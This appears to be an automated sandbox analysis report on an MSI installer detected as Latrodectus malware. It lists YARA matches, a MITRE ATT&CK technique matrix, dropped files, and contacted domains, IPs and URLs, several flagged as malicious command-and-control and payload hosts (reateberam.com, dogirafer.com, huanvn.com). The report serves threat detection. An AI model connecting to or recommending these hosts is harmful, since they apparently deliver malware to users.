Source: Yara match	File source: 00000005.00000002.4125925258.0000023CDAA1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2049513486.0000023CDAA4B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 7664, type: MEMORYSTR

Yara detected Latrodectus

Source: Yara match	File source: 00000009.00000002.4132374823.0000000009F9A000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	131 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	1 Replication Through Removable Media	2 Native API	1 Valid Accounts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	1 Credentials In Files	11 Peripheral Device Discovery	Remote Desktop Protocol	1 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Service Execution	1 Windows Service	1 Valid Accounts	2 Obfuscated Files or Information	Security Account Manager	1 Account Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Access Token Manipulation	1 DLL Side-Loading	NTDS	2 File and Directory Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 Windows Service	1 File Deletion	LSA Secrets	158 System Information Discovery	SSH	Keylogging	114 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	813 Process Injection	121 Masquerading	Cached Domain Credentials	1 Query Registry	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Valid Accounts	DCSync	191 Security Software Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Virtualization/Sandbox Evasion	Proc Filesystem	12 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	13 Process Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	813 Process Injection	Network Sniffing	1 Application Window Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Rundll32	Input Capture	1 System Owner/User Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	Embedded Payloads	Keylogging	1 Remote System Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking
Determine Physical Locations	Virtual Private Server	Compromise Hardware Supply Chain	Unix Shell	Systemd Timers	Systemd Timers	Command Obfuscation	GUI Input Capture	21 System Network Configuration Discovery	Replication Through Removable Media	Email Collection	Proxy	Exfiltration over USB	Network Denial of Service

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
zdi.txt.msi	0%	ReversingLabs

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Roaming\wait.dll	0%	ReversingLabs
C:\Windows\Installer\MSI468D.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI46EC.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI471C.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI473C.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI48D4.tmp	0%	ReversingLabs

Source	Detection	Scanner	Label
https://dogirafer.com/test/1b87bd06	0%	Avira URL Cloud	safe
https://reateberam.com/=	100%	Avira URL Cloud	malware
https://reateberam.com/test/	100%	Avira URL Cloud	malware
https://dogirafer.com/gs	0%	Avira URL Cloud	safe
https://huanvn.com/	0%	Avira URL Cloud	safe
https://reateberam.com/test/5865723_17335797906044_2080493URLS1https://dogirafer.com/test/5205754_80	100%	Avira URL Cloud	malware
https://dogirafer.com/=	0%	Avira URL Cloud	safe
https://dogirafer.com/test/Q	0%	Avira URL Cloud	safe
https://reateberam.com/test/32.dll	100%	Avira URL Cloud	malware
https://dogirafer.com/A	0%	Avira URL Cloud	safe
https://dogirafer.com/st/	0%	Avira URL Cloud	safe
https://reateberam.com/	100%	Avira URL Cloud	malware
https://dogirafer.com/6122658-3693405117-2476756634-1002	0%	Avira URL Cloud	safe
https://dogirafer.com/test/	0%	Avira URL Cloud	safe
https://huanvn.com:6542/stop.php	0%	Avira URL Cloud	safe
https://dogirafer.com/	0%	Avira URL Cloud	safe
https://dogirafer.com/test/p	0%	Avira URL Cloud	safe
https://reateberam.com/test/v	100%	Avira URL Cloud	malware
https://huanvn.com:6542/stop.phpF	0%	Avira URL Cloud	safe
https://huanvn.com/a	0%	Avira URL Cloud	safe
https://reateberam.com/test/4782396_3336673150375_5876994URLS1https://dogirafer.com/test/7951999_661	100%	Avira URL Cloud	malware
https://reateberam.com/files/stkm.binbm	100%	Avira URL Cloud	malware
https://reateberam.com/test/1424693_495962074200_3017094URLS1https://dogirafer.com/test/3578852_8133	100%	Avira URL Cloud	malware
https://dogirafer.com/vider	0%	Avira URL Cloud	safe
https://reateberam.com/test/7765524_55360872352224_4448453URLS1https://dogirafer.com/test/604857_961	100%	Avira URL Cloud	malware
https://reateberam.com/files/stkm.bin	100%	Avira URL Cloud	malware
https://dogirafer.com/est/mX	0%	Avira URL Cloud	safe
https://dogirafer.com/3p	0%	Avira URL Cloud	safe
https://dogirafer.com/est/-	0%	Avira URL Cloud	safe
https://dogirafer.com/test/-	0%	Avira URL Cloud	safe
https://huanvn.com:6542/stop.phpl	0%	Avira URL Cloud	safe
https://dogirafer.com/V=	0%	Avira URL Cloud	safe
https://reateberam.com/test/3426159_38935932553563_5901982URLS1https://dogirafer.com/test/8447341_42	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.210.172	true	false	high
reateberam.com	104.21.16.251	true	true	unknown
huanvn.com	103.57.249.207	true	true	unknown
dogirafer.com	104.21.68.89	true	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://reateberam.com/test/	true	Avira URL Cloud: malware	unknown
https://dogirafer.com/test/	true	Avira URL Cloud: safe	unknown
https://reateberam.com/files/stkm.bin	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://aka.ms/odirmr	explorer.exe, 00000009.00000000.2052116683.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3462488864.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4127934640.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3114928879.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3618520835.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false		high
http://schemas.mi	explorer.exe, 00000009.00000002.4131028570.0000000009833000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2053703533.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3113996324.0000000009830000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461728265.0000000009830000.00000004.00000001.00020000.00000000.sdmp	false		high
https://dogirafer.com/test/1b87bd06	explorer.exe, 00000009.00000002.4131878847.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reateberam.com/=	explorer.exe, 00000009.00000003.3618362462.0000000009976000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://dogirafer.com/gs	explorer.exe, 00000009.00000003.3460642959.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3460184763.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461404501.000000000CB92000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl	explorer.exe, 00000009.00000002.4127934640.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		high
https://powerpoint.office.comcember	explorer.exe, 00000009.00000002.4137653030.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2056295568.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false		high
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000009.00000002.4131028570.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2053703533.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://huanvn.com/	rundll32.exe, 00000005.00000002.4125203904.0000023CD8B80000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2049440069.0000023CD8B80000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-	explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://excel.office.com	explorer.exe, 00000009.00000002.4137653030.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2056295568.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false		high
http://schemas.micro	explorer.exe, 00000009.00000002.4132205195.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.4129592451.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.2053182664.0000000008720000.00000002.00000001.00040000.00000000.sdmp	false		high
https://dogirafer.com/=	explorer.exe, 00000009.00000003.3460642959.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4139893118.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3460184763.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461404501.000000000CB92000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reateberam.com/test/32.dll	explorer.exe, 00000009.00000002.4137653030.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we	explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://reateberam.com/test/5865723_17335797906044_2080493URLS1https://dogirafer.com/test/5205754_80	explorer.exe, 00000009.00000003.3116501774.0000000008FB0000.00000040.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://dogirafer.com/A	explorer.exe, 00000009.00000003.3461113285.000000000132C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dogirafer.com/test/Q	explorer.exe, 00000009.00000002.4125057147.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461113285.000000000132C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3618284131.0000000001332000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reateberam.com/	explorer.exe, 00000009.00000003.3618362462.0000000009976000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4137653030.000000000C54A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3105045961.000000000CB53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3113818155.000000000132C000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY	explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://dogirafer.com/6122658-3693405117-2476756634-1002	explorer.exe, 00000009.00000002.4137653030.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	rundll32.exe, 00000005.00000003.2049365598.0000023CD8BE7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2809051343.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2049378900.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2808932864.0000023CD8BEA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4125363577.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	rundll32.exe, 00000005.00000003.2049365598.0000023CD8BE7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2809051343.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2049378900.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2808932864.0000023CD8BEA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4125363577.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark	explorer.exe, 00000009.00000000.2052116683.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4127934640.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi	explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://api.msn.com/q	explorer.exe, 00000009.00000002.4131028570.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2053703533.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false		high
https://dogirafer.com/st/	explorer.exe, 00000009.00000002.4131878847.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc	explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://dogirafer.com/test/p	explorer.exe, 00000009.00000003.3460184763.000000000CAB3000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	explorer.exe, 00000009.00000000.2056295568.000000000C893000.00000004.00000001.00020000.00000000.sdmp	false		high
https://dogirafer.com/	explorer.exe, 00000009.00000003.3460642959.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3460184763.000000000CB51000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461113285.000000000132C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4139893118.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4137653030.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3460184763.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4131878847.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461404501.000000000CB92000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1	explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://huanvn.com:6542/stop.php	rundll32.exe, 00000005.00000002.4125203904.0000023CD8B80000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2809051343.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2049378900.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4125113963.0000023CD8B0F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4125363577.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2049440069.0000023CD8B80000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reateberam.com/test/v	explorer.exe, 00000009.00000002.4137653030.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg	explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark	explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A	explorer.exe, 00000009.00000000.2052116683.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4127934640.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg	explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000009.00000000.2052116683.00000000079B1000.00000004.00000001.00020000.00000000.sdmp	false		high
https://wns.windows.com/L	explorer.exe, 00000009.00000000.2056295568.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4137653030.000000000C557000.00000004.00000001.00020000.00000000.sdmp	false		high
https://huanvn.com:6542/stop.phpF	rundll32.exe, 00000005.00000003.2049378900.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://word.office.com	explorer.exe, 00000009.00000002.4137653030.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2056295568.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false		high
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://huanvn.com/a	rundll32.exe, 00000005.00000002.4125203904.0000023CD8B80000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2049440069.0000023CD8B80000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu	explorer.exe, 00000009.00000000.2052116683.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4127934640.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		high
https://reateberam.com/test/4782396_3336673150375_5876994URLS1https://dogirafer.com/test/7951999_661	explorer.exe, 00000009.00000003.3188591617.0000000008830000.00000040.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent	explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win	explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://reateberam.com/files/stkm.binbm	explorer.exe, 00000009.00000003.3460184763.000000000CAB3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4139756497.000000000CAB3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3105045961.000000000CAB3000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://r10.o.lencr.org0#	rundll32.exe, 00000005.00000003.2808932864.0000023CD8BEC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2049365598.0000023CD8BE7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2809051343.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2049378900.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2808932864.0000023CD8BEA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4125363577.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://schemas.micr	explorer.exe, 00000009.00000002.4131028570.0000000009833000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2053703533.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3113996324.0000000009830000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461728265.0000000009830000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-	explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://aka.ms/Vh5j3k	explorer.exe, 00000009.00000000.2052116683.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3462488864.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4127934640.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3114928879.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3618520835.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://reateberam.com/test/1424693_495962074200_3017094URLS1https://dogirafer.com/test/3578852_8133	explorer.exe, 00000009.00000003.3210130815.0000000008B70000.00000040.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://api.msn.com/v1/news/Feed/Windows?&	explorer.exe, 00000009.00000000.2053703533.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4131028570.0000000009702000.00000004.00000001.00020000.00000000.sdmp	false		high
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg	explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark	explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://dogirafer.com/vider	explorer.exe, 00000009.00000002.4131878847.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reateberam.com/test/7765524_55360872352224_4448453URLS1https://dogirafer.com/test/604857_961	explorer.exe, 00000009.00000003.3165319740.0000000003460000.00000040.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.rd.com/list/polite-habits-campers-dislike/	explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.thawte.com/cps0/	zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	false		high
https://dogirafer.com/est/mX	explorer.exe, 00000009.00000002.4131878847.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000009.00000000.2056295568.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.thawte.com/repository0W	zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	false		high
https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar	explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://dogirafer.com/test/-	explorer.exe, 00000009.00000003.3460642959.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4139893118.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3460184763.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461404501.000000000CB92000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
